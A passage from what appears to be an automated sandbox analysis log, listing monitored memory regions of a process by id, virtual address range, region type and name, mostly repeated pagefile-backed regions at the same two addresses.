0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13395 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13396 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13397 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13398 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13399 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13400 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13401 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13402 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13403 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13404 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13405 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13406 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13407 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13408 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13409 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13410 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13411 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13412 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13413 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13414 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13415 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13416 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13417 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13418 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13419 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13420 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13421 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13422 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13423 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13424 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13425 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13426 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13427 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13428 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13429 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13430 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13431 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13432 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13433 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13434 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13435 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13436 start_va = 0x49d0000 end_va = 0x49f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 13437 start_va = 0x4a00000 end_va = 0x4a21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 13438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13440 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13441 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13449 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13452 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13453 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13454 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13458 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13459 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13460 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13461 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13464 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13465 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13466 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13467 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13468 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13470 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13471 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13474 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13475 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13478 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13479 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13480 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13482 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13486 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13487 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13488 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13489 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13490 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13491 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13492 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13494 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13495 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13496 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13497 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13498 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13499 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13500 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13501 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13502 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13503 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13504 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13505 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13506 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13507 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13508 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13509 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13510 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13511 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13512 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13513 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13514 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13515 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13516 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13517 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13518 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13519 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13520 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13521 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13522 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13523 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13524 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13525 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13526 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13527 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13528 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13529 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13530 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13531 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13532 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13533 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13534 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13535 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13536 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13537 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13538 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13539 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13540 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13541 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13542 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13543 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13544 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13545 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13546 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13547 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13548 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13549 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13550 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13551 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13552 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13553 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13554 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13555 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13577 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 